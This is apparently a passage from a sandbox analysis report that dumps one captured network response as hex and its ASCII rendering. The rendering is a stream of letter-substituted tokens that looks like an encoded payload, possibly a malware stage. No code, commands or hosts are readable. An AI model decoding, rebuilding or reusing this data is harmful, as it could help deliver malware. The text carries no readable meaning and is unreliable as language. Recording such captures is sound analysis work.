                                                            2021-10-29 18:10:59 UTC1662INData Raw: 59 78 20 4b 6b 20 59 6f 20 59 4b 20 6b 4b 20 4f 4f 4b 20 45 6b 20 4f 78 6b 20 4f 4f 6f 20 59 78 20 4f 78 59 20 59 4f 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 52 4f 20 4b 6b 20 59 78 20 59 59 20 74 51 20 52 52 20 4f 4f 59 20 4f 78 51 20 59 6f 20 4b 6b 20 4b 6b 20 59 78 20 59 45 20 6b 4b 20 4f 4f 4b 20 4f 78 78 20 45 78 20 74 51 20 59 78 20 4b 6b 20 59 52 20 52 78 20 6b 52 20 4f 4f 4f 20 6f 4b 6b 20 59 59 20 4f 4f 6f 20 59 78 20 4b 51 20 6f 45 20 6f 45 78 20 4f 4b 78 20 4f 4f 4b 20 4f 4f 74 20 4f 78 59 20 6b 6b 20 59 20 4b 6b 20 59 78 20 52 78 20 45 51 20 74 4b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 52 20 51 20 59 78 20 59 4b 20 51 4b 20 4f 6f 4f 20 4f 4f 4b 20 52 51 20 74 4b 20 59 78 20 4b 6b 20 59 52 20 6f 74 20 6b 45 20 4f
                                                            Data Ascii: Yx Kk Yo YK kK OOK Ek Oxk OOo Yx OxY YO YK kK OOE OOt OxQ OOo RO Kk Yx YY tQ RR OOY OxQ Yo Kk Kk Yx YE kK OOK Oxx Ex tQ Yx Kk YR Rx kR OOO oKk YY OOo Yx KQ oE oEx OKx OOK OOt OxY kk Y Kk Yx Rx EQ tK OOt OxQ Ooo oR Q Yx YK QK OoO OOK RQ tK Yx Kk YR ot kE O
                                                            2021-10-29 18:10:59 UTC1664INData Raw: 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 6f 6f 52 20 6f 4f 4b 20 59 78 20 59 4b 20 6b 78 20 51 78 20 52 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 51 45 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 4f 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 20 74 6f 20 59 4f 20 4b 6b 20 59 6f 20 45 51 20 6b 45 20 51 51 20 4f 4f 45 20 4f 6f 4b 20 4f 4f 74 20 4b 59 20 52 45 20 4f 51 4f 20 4f 78 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 74 6f 20 4f 52 78 20 4f 59 59 20 4b 6b 20 59 78 20 59 78 20 4f 6f 4b 20 52 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 52 59 20 6b 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 6f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 59 52 20 6f 52 20 4b 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 6f 20 74
                                                            Data Ascii: K OOK OOt Oxk kY ooR oOK Yx YK kx Qx RR OxQ OOo YR Rt Ox YK kK Oox oR OQE OOo Yx YK QE OE kK OOK Oot o to YO Kk Yo EQ kE QQ OOE OoK OOt KY RE OQO Oxk kK OOK OOR to ORx OYY Kk Yx Yx OoK RQ OOt OxQ Ooo RY k Yx YK QK oQ oOt OxQ OOo Yo YR oR Kk kK OOK OOY o t
                                                            2021-10-29 18:10:59 UTC1665INData Raw: 4b 4f 20 4f 6b 74 20 4f 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 6f 6f 52 20 4f 45 6f 20 59 78 20 59 4b 20 6b 78 20 51 78 20 52 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 51 45 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 4f 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 6f 52 20 4f 4f 51 20 45 59 20 59 59 20 4b 45 20 4f 6b 74 20 4f 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 6f 6f 52 20 4f 59 51 20 59 78 20 59 4b 20 6b 78 20 51 78 20 52 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 45 4f 20 4b 4f 20 52 51 20 4f 4f 74 20 4f 78 6b 20 6f 6f 4b 20 4b 6f 20 59 78 20 4b 6b 20 59 4f 20 4f 51 20 4f 45 6f 20 4f
                                                            Data Ascii: KO Okt OK OOK OOt Oxk kY ooR OEo Yx YK kx Qx RR OxQ OOo YR Rt Ox YK kK Oox oR OQE OOo Yx YK QE OE kK OOK Oot OoR OOQ EY YY KE Okt OK OOK OOt Oxk kY ooR OYQ Yx YK kx Qx RR OxQ OOo YR Rt Ox YK kK Oox oR KY OOo Yx Yk EO KO RQ OOt Oxk ooK Ko Yx Kk YO OQ OEo O
                                                            2021-10-29 18:10:59 UTC1666INData Raw: 59 59 20 4f 4b 20 52 51 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 78 78 20 45 45 20 59 4b 20 45 59 20 59 78 20 52 51 20 4f 4f 51 20 4f 78 52 20 4f 6f 78 20 6f 59 45 20 4f 78 4b 20 4b 6b 20 59 78 20 59 59 20 4f 4f 45 20 4f 52 6f 20 4f 59 74 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4b 20 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 52 20 6b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 4f 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 4f 78 4f 20 6b 6b 20 59 6f 20 4b 6b 20 59 78 20 4b 6b 20 45 6b 20 4f 20 4f 4f 51 20 4f 78 51 20 78 20 74 52 20 4b 52 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 4f 78 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 45 59 20 59 45 20 52 51 20 4f 52 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 51 20 59 6b 20 45 45 20 59 6b 20 45 51 20 6b 78 20 51 51 20 4f 4f 6f
                                                            Data Ascii: YY OK RQ OOY OOt OxQ Oxx EE YK EY Yx RQ OOQ OxR Oox oYE OxK Kk Yx YY OOE ORo OYt OxQ OOo YK oK Y YK kK Oox R kY OOo Yx Yk QE OYK kK OOK OOY OxO kk Yo Kk Yx Kk Ek O OOQ OxQ x tR KR Yx YK QK oQ OxR OxQ OOo YR EY YE RQ OR OOY OOt Oxt QQ Yk EE Yk EQ kx QQ OOo
                                                            2021-10-29 18:10:59 UTC1668INData Raw: 4f 74 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 4f 4b 20 52 20 4f 20 4b 6f 20 4b 6b 20 45 45 20 59 51 20 6b 59 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 4b 59 20 4f 20 4f 20 59 74 20 6b 74 20 51 78 20 52 6f 20 4f 78 51 20 4f 4f 6f 20 59 52 20 59 78 20 6f 52 20 4b 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 4f 78 45 20 51 4f 20 52 78 20 59 78 20 45 52 20 45 4b 20 4f 6f 4b 20 6b 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 51 45 20 4f 4f 20 59 78 20 59 4b 20 51 4b 20 4f 6f 78 20 4f 74 4f 20 4f 4f 78 20 6b 52 20 6f 45 52 20 4b 6b 20 59 6f 20 6f 6b 20 6b 59 20 51 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 59 4b 20 59 78 20 45 20 4f 4f 4f 20 4f 4f 4b 20 4f 4f 6b 20 51 6b 20 4f 4f 6f 20 59 78 20 4b 51 20 45 45 20 52 20 6b 52 20 4f 4f 4b 20 6b 6f 20 4f 78 51 20 4f 4f
                                                            Data Ascii: Ot kK OOK Oot OOK R O Ko Kk EE YQ kY OOt OxQ Ooo KY O O Yt kt Qx Ro OxQ OOo YR Yx oR Kx kK OOK OOY OxE QO Rx Yx ER EK OoK kK OOt OxQ OOk QE OO Yx YK QK Oox OtO OOx kR oER Kk Yo ok kY Qk OOt OxQ OOo Yx YK Yx E OOO OOK OOk Qk OOo Yx KQ EE R kR OOK ko OxQ OO
                                                            2021-10-29 18:10:59 UTC1669INData Raw: 52 20 51 45 20 4f 78 4f 20 4f 4f 6f 20 59 78 20 6f 74 20 51 45 20 6f 4b 6b 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 6f 20 4f 52 4f 20 59 4f 20 4b 6b 20 59 6f 20 52 78 20 4f 45 6b 20 4f 4f 45 20 6b 45 20 4f 74 51 20 4f 4f 6f 20 6f 45 52 20 59 4f 20 6f 78 20 6f 45 6f 20 6b 4b 20 4f 4f 52 20 51 59 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 4f 45 20 52 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 74 20 4b 51 20 59 78 20 59 4b 20 74 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 6b 45 20 59 4f 20 4b 6b 20 59 78 20 59 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 51 6b 20 4f 4f 6f 20 59 78 20 4b 51 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 4f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 4b 20 59 4f 20 59 4b 20 6b 4b 20 51 78 20 4f 4f 52 20 4f 78 51 20 4f
                                                            Data Ascii: R QE OxO OOo Yx ot QE oKk kY OOK OOY o ORO YO Kk Yo Rx OEk OOE kE OtQ OOo oER YO ox oEo kK OOR QY OxQ OOo Yx OOE R YK kK OOK OOt OxQ OOo Yt KQ Yx YK tR OOK OOt OxQ kE YO Kk Yx YE kK OOK OOt Qk OOo Yx KQ Yx YK kK OOK OoO OxQ OOo Yx KK YO YK kK Qx OOR OxQ O
                                                            2021-10-29 18:10:59 UTC1670INData Raw: 59 78 20 4f 6f 52 20 4b 78 20 4f 4f 4b 20 51 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 6f 20 4f 4f 4b 20 6f 4b 51 20 6f 59 59 20 4f 4f 6f 20 4b 51 20 59 6b 20 59 78 20 59 4b 20 6b 59 20 4f 78 59 20 52 51 20 4f 78 59 20 4f 4f 6f 20 4f 4f 4b 20 4b 51 20 59 78 20 59 4b 20 51 59 20 4f 4f 4b 20 4f 4f 74 20 4f 6f 4b 20 45 20 4f 6f 4f 20 4b 51 20 59 78 20 4b 6b 20 51 4b 20 4f 4f 6f 20 6f 52 20 59 6f 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 4f 78 51 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 6f 20 74 6f 20 4f 4b 59 20 4b 6b 20 59 78 20 59 4b 20 6b 45 20 6f 51 20 4f 6f 6f 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 6b 20 45 74 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 6f 4f 20 4f 78 4f 20 45 4f 20 4f 4f 78 20 4b 6b 20 59 78 20 52 78 20 45 6b 20 6f
                                                            Data Ascii: Yx OoR Kx OOK Qt OxQ OOo Yx Kk Yx YK ko OOK oKQ oYY OOo KQ Yk Yx YK kY OxY RQ OxY OOo OOK KQ Yx YK QY OOK OOt OoK E OoO KQ Yx Kk QK OOo oR Yo OOo Yx Yk QE OxQ kK OOK Oot Oxo to OKY Kk Yx YK kE oQ Ooo OxQ OOo YR Rk Et YK kK OOY OoO OxO EO OOx Kk Yx Rx Ek o
                                                            2021-10-29 18:10:59 UTC1672INData Raw: 4f 4b 20 4f 6f 4f 20 4f 78 51 20 4f 4f 6f 20 45 59 20 52 74 20 4b 45 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 6f 74 20 4f 4f 4f 20 4f 4b 20 4b 6b 20 4b 51 20 59 78 20 59 78 20 4f 4f 45 20 51 59 20 51 6b 20 74 59 20 4f 4b 20 59 4f 20 4b 51 20 59 78 20 59 78 20 4f 74 78 20 4f 4f 52 20 4f 59 4f 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 52 74 20 4b 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6b 78 20 6f 45 74 20 4f 4f 4b 20 59 4f 20 4b 6b 20 59 4b 20 45 78 20 6b 59 20 4f 4f 4b 20 4f 4f 74 20 74 78 20 45 4f 20 4b 52 20 4b 6b 20 59 78 20 52 78 20 51 59 20 74 4b 20 52 4b 20 4f 78 6b 20 4f 4f 6f 20 59 78 20 59 59 20 51 45 20 4b 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 51 74 20 4f 6f 78 20 4b 6f 20 45 51 20 45 74 20 4f 6b 74 20 4f 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 45
                                                            Data Ascii: OK OoO OxQ OOo EY Rt KE YK kK Oox Oot OOO OK Kk KQ Yx Yx OOE QY Qk tY OK YO KQ Yx Yx Otx OOR OYO Oxk OOo Yo Rt Kx YK kK Oox kx oEt OOK YO Kk YK Ex kY OOK OOt tx EO KR Kk Yx Rx QY tK RK Oxk OOo Yx YY QE KE kK OOK Oot Qt Oox Ko EQ Et Okt Oo OOK OOt Oxk kY E
                                                            2021-10-29 18:10:59 UTC1673INData Raw: 6f 20 4b 6b 20 59 78 20 59 4b 20 4f 45 6b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4b 78 20 59 4f 20 4b 6b 20 59 78 20 59 52 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 74 6f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 6f 74 20 59 4f 20 59 4b 20 6b 4b 20 6f 52 20 4f 4f 52 20 4f 78 51 20 4f 4f 6f 20 4b 51 20 4b 6b 20 59 78 20 59 4b 20 51 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 4f 4f 4b 20 59 78 20 4b 6b 20 59 78 20 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4b 6f 20 4f 4f 45 20 59 78 20 4b 6b 20 74 4b 20 59 59 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 4b 6b 20 59 78 20 59 4b 20
                                                            Data Ascii: o Kk Yx YK OEk OOK OOt OxQ Kx YO Kk Yx YR kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK to OxQ OOo Yx ot YO YK kK oR OOR OxQ OOo KQ Kk Yx YK QK OOK OOt Oxk OOK Yx Kk Yx t kK OOK OOt Ko OOE Yx Kk tK YY kK OOK Oot OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yo Kk Yx YK
                                                            2021-10-29 18:10:59 UTC1674INData Raw: 74 20 59 78 20 59 4b 20 6b 78 20 51 78 20 52 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 51 45 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 4f 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 52 51 20 4b 51 20 59 78 20 4b 6b 20 59 52 20 6b 51 20 51 6b 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 74 20 59 6f 20 59 52 20 45 59 20 59 78 20 74 6b 20 6f 59 59 20 4b 74 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 6f 4f 20 6f 6f 52 20 6f 78 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 52 51 20 74 4f 20 59 78 20 4b 6b 20 59 52 20 52 51 20 4f 78 6b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 45 4f 20 4f 59 6b 20 4b 6b 20 59 78 20 4b 6b 20 59 51 20 74 45 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 51 45 20 6b 20 59 4f 20 59 4b 20 6b 6f 20 51 51 20 4f
                                                            Data Ascii: t Yx YK kx Qx RR OxQ OOo YR Rt Ox YK kK Oox oR OQE OOo Yx YK QE OE kK OOK Oot RQ KQ Yx Kk YR kQ Qk OOY OOt Oxt Qt Yo YR EY Yx tk oYY Kt OxQ OOo YO oO ooR oxk kK OOK OOE RQ tO Yx Kk YR RQ Oxk OOK OOt OxE EO OYk Kk Yx Kk YQ tE OOt OxQ Ooo QE k YO YK ko QQ O
                                                            2021-10-29 18:10:59 UTC1676INData Raw: 6f 20 59 52 20 74 6b 20 4b 4b 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 4f 4b 20 4f 4f 6f 20 59 78 20 59 6b 20 45 4b 20 59 4b 20 6b 52 20 4f 78 4f 20 6f 4b 6b 20 59 59 20 4f 4f 6f 20 59 78 20 4b 51 20 6f 45 20 45 6f 20 74 59 20 4b 52 20 6f 45 6f 20 4f 6f 6f 20 45 4f 20 6b 59 20 4b 6b 20 59 78 20 52 78 20 51 59 20 4f 4f 74 20 4f 78 51 20 6f 4b 74 20 4f 4f 78 20 4f 51 4f 20 4f 78 52 20 59 78 20 59 4b 20 6b 59 20 6b 74 20 4f 52 59 20 6f 4b 45 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 52 20 4f 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 45 78 20 74 6f 20 59 78 20 4b 6b 20 59 52 20 45 78 20 51 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 6f 20 59 6f 20 59 59 20 45 74 20 4f 74 6f 20 51 4b 20 6b 51 20 4f 4f 45 20 4f 78 52 20 4f 78 6f 20 4f 52 6b 20 59 6b 20 6f 45 52 20 59 45
                                                            Data Ascii: o YR tk KK YK kK Oox oR OOK OOo Yx Yk EK YK kR OxO oKk YY OOo Yx KQ oE Eo tY KR oEo Ooo EO kY Kk Yx Rx QY OOt OxQ oKt OOx OQO OxR Yx YK kY kt ORY oKE OOo Yx Yo oR O kK OOK Oot Ex to Yx Kk YR Ex Q OOK OOt OxE Qo Yo YY Et Oto QK kQ OOE OxR Oxo ORk Yk oER YE
                                                            2021-10-29 18:10:59 UTC1677INData Raw: 20 59 4b 20 6b 59 20 6b 74 20 4f 52 59 20 4f 52 6f 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 52 20 4f 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 45 78 20 74 6f 20 59 78 20 4b 6b 20 59 52 20 52 6b 20 4b 51 20 4f 4f 45 20 4f 4f 74 20 6f 51 20 4f 4b 20 4b 4b 20 4b 6b 20 59 78 20 52 78 20 4f 6f 4b 20 4f 78 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 51 45 20 51 6f 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 4b 45 20 4f 78 51 20 4f 4f 6f 20 59 52 20 45 59 20 59 74 20 45 51 20 51 4b 20 51 78 20 74 45 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 51 20 51 6f 20 45 51 20 51 59 20 51 78 20 74 45 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 51 20 6b 74 20 45 78 20 59 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 74 20 59 52 20 6f 4b 20 4f 6f 4f 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 6f 20 4f
                                                            Data Ascii: YK kY kt ORY ORo OOo Yx Yo oR O kK OOK Oot Ex to Yx Kk YR Rk KQ OOE OOt oQ OK KK Kk Yx Rx OoK OxQ OOt OxQ Ooo QE Qo Yx YK QK oQ KE OxQ OOo YR EY Yt EQ QK Qx tE OxQ OOo YR oQ Qo EQ QY Qx tE OxQ OOo YR oQ kt Ex Yo OOK OOt OxE Qt YR oK OoO YK kK Oox oR Oo O
                                                            2021-10-29 18:10:59 UTC1678INData Raw: 4f 4f 74 20 4f 78 74 20 51 78 20 52 6b 20 59 78 20 6f 52 20 45 59 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 45 4f 20 6b 59 20 59 4b 20 4b 6b 20 52 52 20 45 78 20 4f 4b 4f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 6b 6b 20 59 52 20 4b 6b 20 59 78 20 6f 51 20 6b 74 20 4f 4f 6b 20 6f 52 20 4f 45 45 20 4f 4f 45 20 59 78 20 59 4b 20 6f 4b 20 59 4b 20 74 4f 20 52 52 20 4f 6f 52 20 4f 78 51 20 51 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 4f 4f 20 6b 6b 20 45 51 20 4b 6b 20 59 78 20 4b 6b 20 45 6b 20 4b 59 20 4f 4f 45 20 4f 78 51 20 78 20 6f 52 20 6f 45 45 20 59 78 20 59 4b 20 6b 6f 20 51 78 20 4f 6f 52 20 4f 78 51 20 4f 4f 6f 20 6f 59 20 59 4f 20 59 4b 20 59 4f 20 51 78 20 4f 4f 6b 20 4f 6f 45 20 4f 78 4b 20 4f 6f 52 20 59 6f 20 52 6f
                                                            Data Ascii: OOt Oxt Qx Rk Yx oR EY kK OOK OOY EO kY YK Kk RR Ex OKO OOK OOt Oxt kk YR Kk Yx oQ kt OOk oR OEE OOE Yx YK oK YK tO RR OoR OxQ Qo Yx Kk Yx YK kK OOK OOt OOO kk EQ Kk Yx Kk Ek KY OOE OxQ x oR oEE Yx YK ko Qx OoR OxQ OOo oY YO YK YO Qx OOk OoE OxK OoR Yo Ro
                                                            2021-10-29 18:10:59 UTC1680INData Raw: 20 4f 6b 6b 20 6b 51 20 4f 78 74 20 4f 6b 74 20 52 78 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 4f 6f 59 20 59 45 20 59 59 20 4f 6b 6b 20 51 59 20 74 59 20 51 6b 20 4b 4b 20 4f 78 4f 20 4f 78 6f 20 4b 59 20 45 6f 20 6f 52 20 6b 51 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 52 20 4f 78 6f 20 59 51 20 45 6b 20 59 45 20 4f 6b 4b 20 52 4f 20 4f 6f 6f 20 6f 59 4f 20 4b 20 4b 4f 20 6f 52 20 51 59 20 59 78 20 59 4b 20 51 4b 20 4f 20 4f 78 6f 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 59 4f 20 59 6f 20 45 4b 20 51 45 20 4f 6f 6f 20 6f 52 20 74 74 20 4f 4f 6f 20 59 78 20 59 4b 20 45 45 20 59 78 20 4f 45 6b 20 4f 4f 51 20 6b 45 20 4f 74 51 20 4f 4f 6f 20 45 6b 20 6f 52 20 45 59 20 59 78 20 4f 6f 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 51 52 20 59 78 20 4b 6b 20 59 78 20 59
                                                            Data Ascii: Okk kQ Oxt Okt Rx OOK OOt Oxk OoY YE YY Okk QY tY Qk KK OxO Oxo KY Eo oR kQ kK OOK Oot OxR Oxo YQ Ek YE OkK RO Ooo oYO K KO oR QY Yx YK QK O Oxo OxQ OOo Yo YO Yo EK QE Ooo oR tt OOo Yx YK EE Yx OEk OOQ kE OtQ OOo Ek oR EY Yx OoR OOK OOt Oxk QR Yx Kk Yx Y
                                                            2021-10-29 18:10:59 UTC1681INData Raw: 45 78 20 4b 6b 20 45 51 20 45 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 74 6f 20 6f 4b 20 74 4f 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 4f 6f 20 6f 20 78 20 59 78 20 4b 6b 20 59 52 20 52 4f 20 6b 52 20 4f 4f 52 20 74 20 6f 4b 78 20 4f 4f 74 20 59 78 20 52 4b 20 59 45 20 4b 51 20 6f 4f 6b 20 6f 74 20 51 51 20 52 51 20 4f 78 74 20 59 78 20 4b 6b 20 59 6f 20 6f 52 20 6b 6f 20 4f 20 4b 20 4f 78 51 20 4f 4f 6f 20 59 52 20 74 4b 20 59 6f 20 6f 6b 20 74 4f 20 52 52 20 4f 6f 74 20 4f 78 51 20 6f 4b 4f 20 59 78 20 4b 6b 20 59 78 20 45 59 20 6b 4b 20 4f 4f 4b 20 4f 78 78 20 4f 4f 4f 20 4f 4f 59 20 52 4b 20 4f 45 59 20 59 59 20 59 4b 20 45 52 20 51 78 20 6b 4f 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 45 6b 20 6f 52 20 52 51 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 45 20 4f 4f
                                                            Data Ascii: Ex Kk EQ E OOt OxQ Ooo to oK tO YK kK Oox OOo o x Yx Kk YR RO kR OOR t oKx OOt Yx RK YE KQ oOk ot QQ RQ Oxt Yx Kk Yo oR ko O K OxQ OOo YR tK Yo ok tO RR Oot OxQ oKO Yx Kk Yx EY kK OOK Oxx OOO OOY RK OEY YY YK ER Qx kO OxQ OOo Yo Ek oR RQ kK OOK Oot OxE OO
                                                            2021-10-29 18:10:59 UTC1682INData Raw: 20 51 78 20 6f 6f 4b 20 6f 4b 20 6b 6f 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 78 52 20 51 74 20 6f 59 45 20 4f 78 4b 20 4b 6b 20 59 78 20 59 59 20 4f 4f 45 20 4f 52 6f 20 4f 45 59 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4b 20 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 52 20 6b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 6f 52 20 6b 6b 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 4f 4f 20 45 4f 20 52 52 20 4b 6b 20 59 78 20 52 78 20 6b 74 20 4f 4f 6b 20 51 45 20 74 4b 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 6b 74 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 74 4f 20 4f 4f 6f 20 59 78 20 4b 45 20 6f 20 59 45 20 6b 4b 20 4f 4f 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 45 45 20 4b 6b 20 59 78 20 45 51 20 6b 52 20 51 4b 20 4f 4f 45 20 4f 4f 4f 20 6f 59 4b 20 45 4f 20 59 6f 20 45 6b 20 52 78
                                                            Data Ascii: Qx ooK oK ko YK kK Oox OxR Qt oYE OxK Kk Yx YY OOE ORo OEY OxQ OOo YK oK Y YK kK Oox R kY OOo Yx Yk oR kk kK OOK Oot OOO EO RR Kk Yx Rx kt OOk QE tK OOo Yx YK QE kt kK OOK Oot tO OOo Yx KE o YE kK OOO OOt OxQ OOo EE Kk Yx EQ kR QK OOE OOO oYK EO Yo Ek Rx
                                                            2021-10-29 18:10:59 UTC1684INData Raw: 20 45 59 20 59 45 20 45 45 20 4f 6f 20 4f 78 52 20 4b 78 20 52 4b 20 4f 6f 4b 20 59 6f 20 52 52 20 4f 4f 52 20 4b 51 20 6b 4b 20 6f 20 51 45 20 74 78 20 4f 4f 6f 20 59 78 20 59 6b 20 59 52 20 4b 51 20 52 74 20 4b 6f 20 4f 6f 52 20 4f 78 52 20 4f 4f 4b 20 51 45 20 4f 74 6b 20 59 78 20 59 4b 20 51 4b 20 74 74 20 45 51 20 4f 4b 52 20 4f 4b 45 20 6f 78 59 20 59 4b 20 6f 4b 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 78 6f 20 51 45 20 4f 4f 74 20 59 78 20 4f 4f 6f 20 59 78 20 59 4b 20 6b 4b 20 4f 78 74 20 4f 4f 74 20 4f 78 51 20 51 74 20 52 59 20 4f 74 51 20 59 78 20 59 4b 20 51 4b 20 4f 6f 78 20 51 51 20 4f 78 6f 20 51 4f 20 6f 78 20 59 4b 20 4b 6b 20 4b 51 20 59 51 20 6b 59 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 4b 51 20 59 59 20 4b 51 20 6b 51 20 6f 78 6b 20 4f 4f
                                                            Data Ascii: EY YE EE Oo OxR Kx RK OoK Yo RR OOR KQ kK o QE tx OOo Yx Yk YR KQ Rt Ko OoR OxR OOK QE Otk Yx YK QK tt EQ OKR OKE oxY YK oK YK kK OOK Oxo QE OOt Yx OOo Yx YK kK Oxt OOt OxQ Qt RY OtQ Yx YK QK Oox QQ Oxo QO ox YK Kk KQ YQ kY OOt OxQ Ooo KQ YY KQ kQ oxk OO
                                                            2021-10-29 18:10:59 UTC1685INData Raw: 6b 20 4f 74 78 20 59 4b 20 6b 4f 20 4f 6f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 4b 4f 20 78 20 59 4f 20 59 4b 20 52 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 78 74 20 59 78 20 4b 6b 20 45 59 20 59 6f 20 4b 74 20 4f 4f 6f 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 51 45 20 59 78 20 59 4f 20 59 4b 20 6b 6f 20 4f 6f 78 20 4f 74 4f 20 4f 78 4b 20 6b 52 20 45 52 20 59 6b 20 6f 45 52 20 59 4b 20 6b 6f 20 6b 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 45 6f 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 6f 52 20 52 78 20 4b 6b 20 59 59 